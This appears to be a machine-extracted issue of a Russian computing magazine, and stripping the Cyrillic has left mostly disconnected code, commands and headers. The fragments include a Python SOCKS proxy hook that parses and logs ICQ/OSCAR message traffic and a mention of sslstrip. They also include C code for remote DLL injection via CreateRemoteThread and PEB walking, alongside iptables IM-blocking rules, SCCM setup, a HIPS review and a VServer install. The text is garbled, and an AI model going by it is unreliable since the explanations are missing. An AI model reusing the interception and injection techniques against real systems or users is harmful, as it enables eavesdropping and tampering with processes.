octets_in += len(data)
else:
raise Connection_Closed
.
( ). client_sock , ,
my_hack. .
, my_hack,
, , .
my_hack.py,
socks-, :
def my_hack(type,data):
return data
, (my_hack) , ,
socks-.
099
++++
>> coding
++++
OSCAR
++++
HTTP://WWW
++++
++++
++++
++++
++++
links
: dev.aol.com/
aim/oscar.
OSCAR , ,
. AOL ( Time Warner): ICQ AIM. AOL 5 2008
. , .
DES:
sourceforge.net/
projects/pydes.
Pythone socks,
:
sourceforge.net/
projects/pysocks.
++++
++++
DVD
dvd
++++
++++
++++
socks
.
!
++++
INFO
++ ++
info
++++
++++
++++
++++
SOCKS
,
(). SOCKS
SOCKetS (,
).
100
NETBEANS
pyDes.py, Todd
Whiteman.
padmode=pyDes.PAD_PKCS5.
encrypt decrypt .
, -.
:
.
, , .
.
my_hack:
import pyDes
#
def encode(password,data):
k = pyDes.des(pass,
padmode = pyDes.PAD_PKCS5)
return k.encrypt(data)
#
def decode(password,data):
k = pyDes.des(pass,
padmode=pyDes.PAD_PKCS5)
return k.decrypt(data)
DES-,
3DES. AES, Python
Cryptography Toolkit.
#
if type == 1:
file = open('q.txt.', 'w+')
file.write(data)
file.close()
,
0x2a02, 2 (,
). 2 ,
, 6 .
;
0x00040006.
26.
. ,
. 39 + 4 .
45 + _ .
X 08 /128/ 09
>> coding
NETBEANS
,
:
if type == 1:
#
if data[0:2] == '\x2a\x02'
and data[6:10] == '\x00\x04\x00\x06':
#
len_num = ord(data[26])
#
len_msg = ord(data[39+len_num])*256
+ord(data[40+len_num])-4
#
msg = data[45+len_num:45+len_num+len_msg]
, ? ,
, .
,
base64 base64,
, DES
:
enc_msg = encode(pass, msg)
enc_msg = base64.encodestring(enc_msg)
!
. , ,
, .
#
len_enc_msg = len(enc_msg)+4
len_num_1 = chr(len_enc_msg / 256)
len_num_2 = chr(len_enc_msg % 256)
X 08 /128/ 09
#
data = data[0:39+len_num] + len_num_1
+ len_num_2 + \x00\x02\x00\x00
+ enc_msg + data[45+len_num+len_msg:]
5- 6- , :
#
len_all = len(data)-6
len_all_1 = chr(len_all / 256)
len_all_2 = chr(len_all % 256)
#
data = data[0:4]+len_all_1 + len_all_2 + data[6:]
(
), hex.
, , . . -,
, , , .
,
, -
. , , ,
, https.
, ,
, . sslstrip,
12- .
, ! ?
? , , :).
, , , . : spirt40@gmail.com! z
101
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
/ALEKSANDR-EHKKERT@RAMBLER.RU/
, , WinDDK ,
,
Windows .
CONFICKERA
++++
++++
++++
++++
-, , 10 . ,
.
,
.
, . ?
.
.
, ,
(, ?)
102
. . ,
, svchost.exe.
.
,
. ,
(
USB-, , , ).
. dll, . -,
system32 dll- .
, ,
svchost.exe.
X 08 /128/ 09
>> coding
Sysinternals, . , dll-
PEBe (
z, PETools . ListDlls Sysinternals,
. HandleViewer
lepujmlx.dll, svchost.exe. ,
, ,
.
, ntdll.dll, ,
, . , .
RKUnhooker .
, Confickera
( KidoKiller KAV EConfickerRemover ESET), ,
, lepujmlx.
dll , .
, svchost.exe lepujmlx.dll,
.
dll
svchost.exe .
Confickera,
, ; . -
- ,
.
, ,
LdrLoadDll . , NtOpenProcess, NtWriteVirtualMemory
NtReadVirtualMemory . ,
.
, .
, ,
FreeLibrary, ,
. , ,
.
. , dll
CreateRemoteThread.
:
DLL
: , , dll .
LoadLibrary ,
, LdrLoadDll. ,
LdrLoadDll, , ,
LdrLoadDll ntdll.dll.
usermode ntdll.
X 08 /128/ 09
hProcess = OpenProcess(...);
LibFileRemote = (PWSTR) VirtualAllocEx(hProcess...);
WriteProcessMemory(hProcess, LibFileRemote, ...);
PTHREAD_START_ROUTINE fnThreadRtn =
(PTHREAD_START_ROUTINE) GetProcAddress(
GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
fnThreadRtn, LibFileRemote, 0, NULL);
LdrLoadDll
LdrpLoadModule LdrAttachProcess, .
,
.
103
++++
>> coding
++++
++++
++++
++++
++++
++++
RKUNHOOKER SSDT
++++
++++
HTTP://WWW
links
++++
++++
++++
Windows
rsdn.ru wasm.ru.
Win
ntkernel.com.
++++
++++
++ ++
++++
INFO
info
Windows
,
HKEY_CURRENT_
USER\Software\
++++
Microsoft\Windows\
CurrentVersion\
Policies\Explorer
++++
++++
NoDriveType
AutoRun 0xff.
104
dll OpenFile/
CreateSection/MapViewOfSection. , ,
.
(, ntdll.dll
):
DWORD GetDllFunctionAddress(
char* lpFunctionName,
PUNICODE_STRING pDllName)
{
ZwOpenFile(...);
ZwCreateSection(...);
ZwMapViewOfSection(...);
...
dosheader = (IMAGE_DOS_HEADER *)hMod;
//
...
for(i = 0;
i < pExportTable-> NumberOfFunctions;
i++)
{
functionName = (char*)( (BYTE*)hMod +
arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x]
+ Base 1;
functionAddress = (DWORD)( (BYTE*)hMod +
arrayOfFunctionAddresses
[functionOrdinal]);
if (RtlCompareString(&ntFunctionName,
&ntFunctionNameSearch, TRUE) == 0)
return functionAddress;
}
return 0;
}
, LdrLoadDll, .
,
. LdrLoadDll,
. ,
, . KeAttachProcess svchost.exe
PEB (Process Environment Block; ,
z).
LDR_DATA_TABLE_ENTRY,
, ModuleBaseAddress.
: ntdll.dll
svchoste. , ,
LdrLoadDll.
myLdrLoadDll, .
, .
, .
, :
ntdll.dll
ZwQueryInformationProcess(
NtCurrentProcess(),
ProcessBasicInformation, &ProcInfo,
sizeof(PROCESS_BASIC_INFORMATION), &Size);
pPeb = ProcInfo.PebBaseAddress;
// : pPeb
(PEB*)0x7FFDF000;
PPEB_LDR_DATA Ldr = pPeb->Ldr;
PLIST_ENTRY InitialEntry =
Ldr -> InitializationOrder.Flink;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry =
CONTAINING_RECORD( InitialEntry,
LDR_DATA_TABLE_ENTRY,
InitializationOrder);
PLIST_ENTRY LoadOrderListHead =
LdrDataTableEntry->LoadOrder.Blink;
.
X 08 /128/ 09
>> coding
ZwWriteVirtualMemory,
ZwReadVirtualMemory, ZwOpenProcess, ZwDuplicateObject,
ZwQueryInformationProcess ZwProtectVirtualMemory.
.
.
. ,
. : Usermode ,
ntdll.dll,
KeServiceDescriptorTable (
, , ).
,
.
KESTACKATTACHPROCESS
, , KeAttachProcess ,
Microsoft, KeStackAttachProcess,
.
.
SSDT
, ,
, MmGetSystemRoutineAddress. ,
, : PVOID func_addres =
MmGetSystemRoutineAddress( &ApiNameUnicode ). . , ,
. ,
Windows .
MmGetSystemRoutineAddress NULL.
: ,
, . .
,
X 08 /128/ 09
DLL-
. ,
, .
,
NtAdjustPrivilegesToken.
,
. , ,
.
,
-
- .
BSOD.
, , , WinDBG - .
, , Immunity debuggerom, ,
, .
! z
DVD
dvd
,
, ,
.
105
>> phreaking
LOCKDOG / LINE3D@YANDEX.RU /
,
(
). , ,
, . .
>> phreaking
? , - .
. (, , ),
. ()
, , ,
, .
.
AVR. ,
. ,
C++ .
C++.
:
, ,
.
,
. ,
, . , .
, ,
,
106
(
). ,
.
. .
. .
ATmega16 , .
( ), , .
,
, , ,
.
, . L7805
5, .
2,5 ,
, , 7,5 . , .
, .
.
DIP ( ) . ,
, USART , .
, X 08 /128/ 09
>> phreaking
.
. RESET (9- ) R1
. ,
, .
, RESET
C1 .
1000 ,
, . X1 C2, C3
XTAL1 XTAL2.
, , ,
. C++.
CodeVisionAVR.
, .
X 08 /128/ 09
.
! , , . . L293D.
D, .
.
DIP SOIC. DIP
- . L293D
,
( VSS),
( VS). L293D 600 ,
. ,
. , , ,
107
>>
>> pc_zone
phreaking
,
:
ATmega16 DIP-40
L7805 TO-220
L293D DIP-16 2
.
0,25
: 10 1 .,
220 4 .
: 0.1 , 1 , 22
: 1000 16 , 220
16 2 .
1N4001 1N4004
16
-:
, ,
-
,
,
.
.
, L293D 1.2 . ,
, .
: IN1 IN2 0,
IN3 IN4 , .
,
. EN1 EN2
.
. ,
,
GND
. ,
.
,
.
-, , , -.
: , -
, . , , . ,
-
. ,
. .
, ,
.
108
, ,
,
. :
.
:
,
, ,
.
#include <mega16.h>
#include <delay.h>
, PORTC
, :
X 08 /128/ 09
>> phreaking
, , .
PORTC.0
PORTC.1
PORTC.2
PORTC.3
=
=
=
=
0xFF;
0x00;
0xFF;
0x00;
0xFF , . 1, 0x00 . 0.
,
:
if (!(PINB & (1<<PINB.0)))
{
...
}
-, 0, ,
. , , . ,
,
, . delay_ms(1000)
X 08 /128/ 09
,
. .
, . , ,
, - , ? , .
,
,
.
TSOP ( -,
)
. ; ,
.
,
. - !
OpenCV,
,
.
. z
109
>> phreaking
CLUSTER / CLUSTERRR@CLUSTERRR.COM /
. , ,
ASUS!
Linux.
, ?
>> phreaking
, . , .
, .
: , , .
-
LPT- . ,
. ,
,
.
. ,
,
.
.
ATmega16, COM-.
. : ,
. , ,
AVR +5 ,
, 0 . .
-, 5 . -, ,
. ;
. .
( PORTx, x
), . . .
COM-
USART-.
110
( ,
AVR). ,
;
.
- . .
, , ?
, ?
. :
,
;
, .
.
. Windows , /
, /
, , / -.
.
,
.
, . ,
, , Nintendo DS .
, , X 08 /128/ 09
>> phreaking
. COM-
COM-
. , COM-
, , ,
.
, :
.
. ,
ASUS WL-500gP. , Linux,
UART-, .
X 08 /128/ 09
,
. !
UART COM-,
MAX3232. . , z 125 (
UART). , , Linux,
COM- ,
, .
, ?
.
111
>>
>> pc_zone
phreaking
. USB- ,
:
IPKG
mount /dev/scsi/host0/bus0/target0/lun0/
part1 /opt
ipkg.sh update
ipkg.sh install ipkg-opt
ipkg update
, /dev/scsi/host0/bus0/target0/
lun0/part1 EXT3- .
; ,
. , , -
MAX3232
DVD
dvd
.
.
112
ASUS
, (,
).
,
. :
http://oleg.wl500g.info.
WL-500gP, .
ipkg.
Step (z
106, Level-up ),
fdisk mke2fs; . ,
,
, . ,
:
echo "#!/bin/sh" > /usr/local/sbin/postmount
echo "mount /dev/scsi/host0/bus0/target0/
lun0/part1 /opt" >> /usr/local/sbin/postmount
chmod +x /usr/local/sbin/post-mount
flashfs save
X 08 /128/ 09
>> phreaking
flashfs commit
flashfs enable
post-mount ,
. , ! , ipkg install
<_>.
,
! ?
,
: ,
.
,
.
, !
? , . ,
. ,
. .
? , . X 08 /128/ 09
113
>>
>> pc_zone
phreaking
, . . ,
. .
TCP-, .
, UART. , , ,
.
/dev/
usb/tts/0 /dev/usb/tts/1. , ,
. ,
. ,
- COM- ? ,
, . ,
:
stty -crtscts 9600 < /dev/tts/1
echo "Hello world!" > /dev/tts/1
. . , .
?
, ,
. , :
int open_uart_port()
{
114
int fd;
struct termios options;
fd = open(UARTPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == -1)
{
perror("Cant open port");
exit(1);
}
tcflush(fd, TCIFLUSH);
tcgetattr(fd, &options);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;
options.c_cflag &= ~CRTSCTS;
options.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
cfsetospeed(&options, B9600);
tcsetattr(fd, TCSANOW, &options);
fcntl(fd, F_SETFL, FNDELAY);
printf("UART (%s) port opened\n", UARTPORT);
return fd;
}
UARTPORT -,
. /dev/tts/1. fopen() ,
. 9600
, ; .
write() read().
, , ,
,
:
int StartListen()
{
int sock;
X 08 /128/ 09
>>>>phreaking
pc_zone
int i = 1;
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Cant create socket");
return -1;
}
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(CCPORT);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sock, (struct sockaddr *)&sa, sizeof sa))
{
perror("Cant bind port");
close(sock);
return -1;
}
if (listen(sock, 15))
{
perror("Cant listen port");
close(sock);
return -1;
}
if (ioctl(sock, FIONBIO, &i))
{
perror("Cant set non-blocking mode");
close(sock);
return -1;
}
printf("Listening on port %u\n", CCPORT);
return sock;
}
CCPORT , . ,
( ).
.
. , ,
. COM-.
X 08 /128/ 09
,
.
Windows,
Borland Delphi. ,
.
,
. , :
, ,
..
, .
, .
, , , .
-! lighttpd, , . PHP.
PHP?
, .
,
-, , .
.
rrdtool,
,
. ,
, .. .
, ,
SMS, - .
.
,
.
,
. ,
- . z
115
>> SYN/ACK
_SSH3R1FF/ SSH3R1FF@GMAIL.COM /
IM, Skype, P2P
>> SYN/ACK
, , , , , ,
. , ,
.
,
IM-
: ,
.
90% , 10%
, ,
,
.
http-
,
. ,
, . .
, , tcpdump
:
$ sudo tcpdump -i eth0
:
21:33:55.687042 IP 10.10.10.10.33018
> 64.12.26.150.aol: . ack 11334 win
63920
, , IP- ICQ, , .
grep aol
/etc/protocols, tcpdump '-n'
. , :
$ sudo tcpdump -i eth0 dst portrange
5190
116
, . IM-.
ICQ, ,
login.icq.com 5190. , 5190
443.
,
:
$ host login.icq.com
login.icq.com is an alias for login.
messaging.aol.com.
login.messaging.aol.com has address
64.12.161.153
, login.icq.com
, , ,
. . ,
ICQ
,
.
dig
(dig login.icq.com).
. , -
(
iptables,
):
iptables -A FORWARD -p TCP --dport
5190 -j DROP
iptables -A OUTPUT -d login.icq.com
-j REJECT
iptables -A OUTPUT -d id.rambler.ru
-j REJECT
, IP
,
,
. ,
www.icq.com/icq2go, -.
, IP (
dig):
iptables -A OUTPUT -d 64.12.0.0/16
-j REJECT
iptables -A OUTPUT -d 205.188.0.0/16
-j REJECT
icq2go
(- www.meebo.com), IM- .
. tcpdump',
, Yahoo! Messenger
TCP-: 5000-5001,5050,5100 UDP-: 5000-5010, MSN 1863, Jabber/Gtalk
5222, 5223, IRC 6667-6669, ail : 2041, 2042.
, ! ,
(, IRC ..)
.
. ,
Yahoo Messenger:
X 08 /128/ 09
>> SYN/ACK
iptables
iptables
iptables
iptables
iptables
iptables
-A
-A
-A
-A
-A
-A
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
-p
-p
-p
-p
-d
-d
DNS-,
. , DNS-
,
tcpdump. DNS- OpenBSD,
BIND 9.3.4:
$ sudo vim /var/named/etc/named.conf
logging {
//
MIPKO EMPLOYEE
MONITOR
: ICQ ,
, ,
. , , . . ,
, .
,
, .
MIPKO Employee Monitor (www.mipko.ru).
,
.
.
.
X 08 /128/ 09
channel queries_ch {
// - (
chroot-),
file "/log/queries.log" versions 5 size 10m;
// (
debug, info)
severity debug;
// ,
print-category yes;
print-severity yes;
print-time yes;
};
//
category queries { queries_ch; };
category resolver { queries_ch; };
};
l7-filter 10
12 , .
, /proc/
net/layer7_numpackets:
$ sudo sh -c "echo 16 > /proc/net/layer7_numpackets"
117
>> SYN/ACK
- ICQ2GO
HOST DIG,
ICQ
named
DNS-:
INFO
info
Squid
z - 2008
.
Netfilter
,
l7-filter.
HTTP://WWW
links
Netfilter/Iptables
netfilter.org.
Squid www.squidcache.org.
l7-filter l7-filter.
sf.net.
IPP2P ipp2p.org.
P2PWall www.
lowth.com/p2pwall.
118
:
$ sudo tail -f /var/named/log/queries.log
30-Jun-2009 16:22:15.036 resolver: debug 1:
createfetch: ns.mail.ru A
30-Jun-2009 16:22:35.179 queries: info: client
192.168.1.21#64773: view internal: query: www.
meebo.com IN A +
30-Jun-2009 16:22:35.868 queries: info: client
192.168.1.21#63341: view internal: query:
js.meebo.com IN A +
netstat/tcpdump/queries.log, .
. , iptstate TOP-
. , :
$ sudo iptstate --dstpt-filter=5190
IM- , 80/443 . iptables ,
, , Squid'
. ,
,
( Squid
z 2008 ). .
, squid.conf :
, IM-,
mail.ru, ,
:
acl im_nets src "/usr/local/etc/squid/icq_
nets.acl"
http_acces deny im_nets !admin
Sarg ( - Squid) , .
IPTABLES ,
,
.
OSI iptables.
2.6.14, ( patcho-matic-ng), , /
. string (xt_string).
, . , :
$ ls /lib/modules/2.6.24-24-generic/kernel/
net/netfilter/xt_string.ko
:
$ sudo iptables -A FORWARD -m string --string
"icq.com" \
--algo kmp --to 65535 -j DROP
, ,
. , /. ,
X 08 /128/ 09
>> SYN/ACK
TCPDUMP
,
Download Master:
$ sudo iptables -A FORWARD -m string --string --algo kmp \
"DownloadMaster" -j REJECT
, . '--algo' , ,
. kmp ( Knuth-Pratt-Morris) bm
( Boyer-Moore). ,
, bm . kmp bm,
. , string '--hex-string',
. ,
, , iptables.
.
, . l7-filter (l7-filter.
sf.net),Zorp(www.balabit.com/network-security/zorp-gateway),IPP2P(ipp2p.
org) P2PWall (www.lowth.com/p2pwall). ,
cp
/boot/config-`uname
-r`
/usr/src/linux/.
l7-filter ( ), :
4.
- VELLE!
. .
1 !
www.velleoats.com
X 08 /128/ 09
119
>> .PRO
SYN/ACK
iptables -A FORWARD -m layer7 l7proto aim -j DROP
iptables -A FORWARD -m layer7 l7proto skypetoskype -j
DROP
iptables -A FORWARD -m layer7 l7proto skypeout -j DROP
: .
L7-FILTER
iptables. (
2.6.28):
$ sudo patch -p1 < ../netfilter-layer7-v2.21/for_older_
kernels/kernel-2.6.22-2.6.24-layer7-2.18.patch
iptables:
$ cd ../iptables
$ iptables -v
iptables v1.3.8
$ sudo patch -p1 < ../netfilter-layer7-v2.21/iptables1.3-for-kernel-2.6.20forward-layer7-2.21.patch
$ sudo chmod +x extensions/.layer7-test
iptables:
$ make KERNEL_DIR=/usr/src/linux
$ sudo make install
, ipp2p-0.8.2/Makefile:36:
You need to install iptables sources and maybe set IPTABLES_SRC.
, ,
iptables.h. /usr/src/iptables.
Makefile :
$ sudo nano Makefile
IPTABLES_SRC = $(wildcard /usr/src/iptables)
#CFLAGS = -O3 -Wall
. , ,
l7-filter, IPP2P make oldconfig && make prepare ( IPP2P
). libipt_ipp2p.
so iptables:
$ sudo cp libipt_ipp2p.so /usr/lib/iptables
:
:
$ sudo make menuconfig
! :
$ sudo iptables -m ipp2p --help
. iptables
-m layer7 --help . , BitTorrent, AIM Skype, :
iptables -A FORWARD -m layer7 l7proto bittorrent -j
DROP
120
, :
iptables -A FORWARD -m ipp2p --edk --kazaa --gnu --bit \
--apple --dc --soul --winmx --ares -j DROP
, . USB/CD/DVD, , . z
X 08 /128/ 09
>> SYN/ACK
GRINDER
/GRINDER@SYNACK.RU /
SCCM:
IT-
>> SYN/ACK
,
, , IT- .
GPO - Radmin.
, .
Microsoft System Center Configuration
Manager, IT-
.
SCCM SCCM 2007 R2 (www.microsoft.com/
systemcenter/configurationmanager)
Systems
Management Server (SMS).
IT-.
System Center , Configuration Manager .
, SCCM
, , , Microsoft, (Desired Configuration,
: , ,
),
.
SC (www.microsoft.com/systemcenter)
, .
:
Data Protection Manager
Windows;
Operations Manager ;
Essentials , X 08 /128/ 09
,
;
Virtual Machine Manager
;
Capacity Planner ,
,
,
;
Service Desk
, ;
Mobile Device Manager (MDM)
Windows Mobile;
Reporting Manager
.
,
,
. (Site system)
,
SCCM. SCCM
single-site multi-site.
SCCM.
(Primary site, ) (Secondary site,
Primary site). Primary
(Central
site). , , -
(). SCCM :
(Management point);
(BITS-enabled
distribution point);
(Reporting
point);
(Software Update Point);
(Server
locator point);
(Fallback status point, Win2k8).
C ,
. Branch
distribution point.
(3-5
) .
SQL-.
Client Agent,
. Native
( )
Mixed ( SMS). Native (
HTTPS). , ( IP, ).
, ( ) .
121
>> SYN/ACK
SCCM
SCCM R2,
WinXP/2003/VistaSP1/2k8, SCCM SP2, Win7/2k8R2/2k8SP2.
: WinXP, Vista
Win7 , Branch
distribution point.
. R2 :
SP1 Full. ,
VHD- SCCM.
, , SCCM SP1
R2. SCCM, , , , .
, SCCM: single-site
multi-site, , , . ,
- .
:
Configuration Manager
2007 Configuration
Manager 2007, TechNet.
PIII 733 , 256
, 5 10 . , ,
, , , .
, .
SQL Server 2005 SP2 (go.microsoft.com/fwlink/?LinkId=69795), . Express Edition . , : IIS 6.0, MMC
3.0, NET Framework 2.0, ASP.NET, BITS (Background Intelligent Transfer
Service) WebDAV.
( ), Win2k3 . , Primary Secondary
RODC ( ). Primary
, ,
, ,
, . Secondary
.
SCCM Win2k8 singlesite Primary site. ,
, AD, SQL- .
, BITS. , IIS
7.0, , .
,
, . . IIS
ASP.NET ASP ( ), Windows
122
, .
>> SYN/ACK
PREREQUISITE
CHECKER , SCCM
SCCM. : (Primary, Secondary CM Console); Primary
, SQL-, WSUS
Management Point (,
). WSUS , SDK Server
. , SDK WSUS,
,
, . SDK-
WSUS, .
; , , . Success ( ),
SCCM.
SCCM - ,
,
, .
CM, ,
, . SCCM
INFO
info
WSUS 3.0
SP1 Win2k8
,
z 2009
.
Run the prerequisite
checker. .
HTTP://WWW
links
SCCM 2007 www.
microsoft.com
/systemcenter/
configuration
manager.
TechNet, SCCM technet.
microsoft.com/ru-ru/
configmgr.
123
>> SYN/ACK
SCCM
DVD
dvd
, ,
SCCM 2007 Win2k8
.
124
, . ,
(site boundary), , ,
(Discovery) (approval).
. SCCM , , site
boundary.
Database
Site management Site settings.
Boundaries. , , , New Boundary (Description), ,
(
), (Type).
; :
IP-subnet (), Active Directory site, IPv6 prefix IPaddress range. , , . Network Connection,
, :
Fast (LAN) Slow. , Boundaries,
.
Discovery methods, 6 ,
. 4 Active Directory ,
, Security;
Heartbeat ( ) Network ( ). Network discovery ,
AD. ,
. , , Enable ... ( Heartbeat
Discovery).
, AD, ( , LDAP
..), , . -
,
.
, Polling Schedule
. , Run discovery as soon as possible.
Active Directory attribute , .
Network discovery , . ,
Type of discovery : , + + . Subnets,
Domains, SNMP, SNMP Devices DHCP
. ,
Subnets ,
, Schedule
.
. .
. . Wake On
LAN
, /. Ports
. Advanced
, , hardware ID.
Automatically create new client records .... , Manually resolve conflicting records. Advanced
SCCM AD . Security
SCCM. , , Site Mode (, ) (Native
Mixed). ,
Approval settings:
Manually approve each computer ,
,
, ;
Automatically approve computers in trusted
domains (recommended) Discovery ;
Automatically approve all computers (not
recommended)
X 08 /128/ 09
>> SYN/ACK
SCCM
. , , AD, .
, .
This site containts only ConfigMgr 2007
clients SCCM- (
SMS ).
, .. (collection) (, ..)
, .
Computer management Collections. (, ). All Systems
, SCCM. ,
Update Collection Membership .
. , Client , , Approved/Assigned/Blocked/Active
. . : ( \\server\site\Client\ccmsetup.exe);
Push-; AD Logon,
.
. Client Push Install () SCCM.
Site settings Client installation method.
Client Push Install .
X 08 /128/ 09
SCCM
, .
, .
,
,
. z
125
>> SYN/ACK
GRINDER
/ GRINDER@SYNACK.RU /
>> SYN/ACK
, . ,
, .
HIPS.
HIPS (Host Intrusion
Prevention System, )
.
,
(
, ),
, / /, ,
.
API-
,
, , .
,
, .
, HIPS .
.
,
, , . ,
, Prevx ( )
, -
126
(
) , .
.
(
, API-) HIPS
. .
: ,
- HIPS,
, ?
,
,
HIPS ,
.
, HIPS.
. .
DEFENSEWALL
: SoftSphere Technologies
Web: www.softsphere.com/rus
: Intel Pentium x86
300 , 256 / (x86/x64) 1 , 512
( WinXP Vista )
: Windows NT/2000/XP/2003/Vista
DefenseWall /
.
(Sandbox), .
-, P2P, IM-
.. , , .
( CD/DVD
). :
,
, .
, ,
. , .
.
(,
..), .
( ).
, , X 08 /128/ 09
>> SYN/ACK
,
.
. ,
, .
. DefenseWall , .
.
: , , ,
. .
, , .
.
/ (GoBanking/Shopping)
, .
.
Expert Mode,
,
.
, ,
(Apache, IIS etc)
, ,
(CodeRed, Slammer, Sasser, Blaster), . ,
, ,
.
SAFE'N'SEC
: S.N.Safe&Software
Web: www.safensoft.ru
: Intel Pentium x86 300 , 256
WinXP / (x86/x64) 1 , 512 Vista
: Windows XP/Vista
HIPS Safe'n'Sec,
S.N.Safe&Software,
V.I.P.O. (Valid Inside Permitted Operations). .
Safe'n'Sec .
, ( SHA-256).
, , ,
, , .
, ,
.
,
. , , . X 08 /128/ 09
.
Safe'n'Sec , .
. Safe'n'Sec 2009. Safe'n'Sec
Enterprise . :
Safe'n'Sec Admin Explorer ;
;
Service Center ,
; , .
, , Dr.Web -.
, .
, ,
, , USB-.
, Safe'n'Sec ,
. , Kaspersky AntiVirus 2009 .
127
>> SYN/ACK
info
HIPS
.
McAfee
:
,
.
Prevx
.
,
, HIPS
.
128
.
(), . IPS
, ,
CISCO SECURITY
AGENT (CSA)
Cisco, 2003
Okena, HIPS
StormWatch Agent,
. CSA
, Windows 2k Vista, RHEL 3.0/4.0, Solaris 8/9
VMware.
. ,
, ,
,
( ,
COM-), , . ,
.
.
. ,
(, , CD/DVD), ..
Cisco Management Center for Cisco Security Agents.
, CSA Cisco IPS, ,
(NAC),
Cisco MARS. ,
.
McAfee .
,
. HIPS , () ( ).
Server, ,
- (Apache 1.3./2., Sun ONE/Java
Web Server) (SQL Server 2000)
(Directory traversal, DoS, SQL
injection .).
HIPS
,
, ePolicy Orchestrator
(
McAfee). , HIPS
ePO.
ePO: 3.6.1 MMC, 4.0.0 -.
HTTP/
HTTPS .
ePO-
Win2k SP4/2003 SP1/SP2/R2,
Win2k/XP/2003/Vista. SQL- SQL Server 2005
Express Edition; SQL Server 2000/2005.
PREVX 3.0
: Prevx Limited
Web: prevx.com
:
: Windows 98/NT/2000/XP/2003/Vista/2008/
Se7en
Prevx 2004 Community IPS,
. Cloud computing
, (software-as-service, SAAS)
Prevx .
Prevx ,
. , .
X 08 /128/ 09
>> SYN/ACK
EPO:
MCAFEE
.
(Prevx Cloud Community Database).
IPS , .
, 768
.
, . . ,
2-4 . , .
, ,
,
.
.
,
. 4 10 , .
250 .
: ( ), (
) . . Prevx , ,
Windows;
.
Home, , Business Enterprise
, . Free Malware Monitor,
, , ,
. ,
.
Prevx ,
: ,
, .
.
,
.
X 08 /128/ 09
PREVX
PREVX : ,
-
, , . HIPS .
. z
?
, , HIPS
,
,
, . HIPS
.
.
DVD
dvd
Safe'n'Sec,
DefenseWall Prevx.
129
>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /
Fujitsu PRIMERGY RX200 S5
> :
D 2786 ( Intel 5500)
> :
1 2 Intel Xeon 55xx
> :
1 96 DIMM DDR3 1066/1333 (12
)
ECC, SDCC, Memory Scrubbing,
> :
8 2,5- SAS
>> SYN/ACK
> RAID:
RAID- 0/1
RX200 S5 Fujitsu,
HP IBM,
.
/ Intel Xeon 55xx,
SAS, 96 DDR3.
RAID 0/1 PCI-X RAID
0,1,10,5,50,6,60. .
-
130
> :
2 Ethernet 1 /
1 iRMC S2 (10/100
/)
> :
,
( 1 + 1)
> :
1 PCI-Express x4 ()
2 PCI-Express x8 (1
, 1 )
> :
ServerView Local Service
Panel (LSP)
(iRMC S2, 32
),
IPMI 2.0
> :
Cool-safe
6
(5+1)
> :
(1U, 431x765x43 )
> -:
7 USB 2.0 (3 , 3
, 1 )
2 VGA (1 )
1 RS-232-C (9-)
> :
3
.
Blue-Ray
Cool-safe.
, Cool-safe,
Computational
Fluid Dynamics, ,
,
.
. ,
89%, -
Green IT.
IPMI 2.0
. .
Microsoft Windows
Server 2003/2008, Novell SUSE Linux Enterprise
Server, Red Hat Enterprise Linux, VMware
Infrastructure.
Linux .
: 60000 .
X 08 /128/ 09
>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /
:
R-Style Marshall NP 2010
> :
16 DDR2-533 DDR2-667
ECC (8 )
> :
IDE-
6 SATA
4 SAS
> RAID:
RAID 0, 1, 10, 5
> :
2 Intel Gigabit Ethernet
> :
550
650
R-Style Marshall NP 2010
>> SYN/ACK
> :
2/4- Intel
Xeon Processor 50xx, 51xx 53xx
667 , 1067 1333
> :
2 PCI Express x4
2 PCI-X 64-bit/133
1 PCI 32-bit/33
> :
Intel 5000V
> -:
7 USB 2.0 (4 , 2 , 1 ,
USB FDD)
2 RS-232-C
Marshall NP 2010
R-Style Computers.
,
( ).
,
, .
Intel Xeon 5000,
DDR2-667 ECC,
16 , 3.5"
SAS/SATA-.
,
web- ( ).
550
650
.
DVDRW - USB-.
X 08 /128/ 09
2 DB-9 (9 pin, )
2 PS/2
> :
: 80
:
120
SAS/SATA HDD:
92
> :
ATI ES1000 (16 SDRAM)
CD, DVD/CDRW DVDRW
> :
(452x235x483)
(6U, 235447483)
> :
3
.
(, ,
, -
).
3
100 , .
: Microsoft Windows Server
2003/2008.
: 35000 .
131
>> SYN/ACK
/ ZOBNIN@GMAIL.COM /
Linux VServer
>> SYN/ACK
, ?
, root? ?
Linux VServer
.
()
FreeBSD Jail.
,
(, /dev /
proc, ),
IP-.
,
, Xen, VMWare KVM,
,
.
,
.
,
,
:
( 2-3%)
.
- ,
. ,
, ,
,
,
,
, ,
.
- .
132
VSERVER? UNIX-
. FreeBSD
Jail, Solaris
(Zones), Linux OpenVZ Linux
VServer.
OpenVZ (openvz.org)
, ,
.
Linux VServer (linux-vserver.org),
,
. OpenVZ
VPS ( ) , VServer
FreeBSD
Jail. Linux VServer
( 7 ) ,
Linux;
,
.
Linux VServer
: Linux-
. VServer
,
Ubuntu 9.04,
,
kernel.org .
, Ubuntu 9.04,
2.6.28, , .
1. apt keyring
VServer:
$ sudo apt-key adv --recv-keys
--keyserver keyserver.ubuntu.com
BB9BFB5B
2.
VServer /etc/apt/sources.list:
deb http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main
deb-src http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main
3. :
$ sudo apt-get update
$ sudo apt-get install linux-imagevserver linux-headers-vserver utilvserver
,
.
1. :
# cd /usr/src
# wget http://www.kernel.org/
pub/linux/kernel/v2.6/linux-2.6.28.7.tar.bz2
# wget http://vserver.13thfloor.
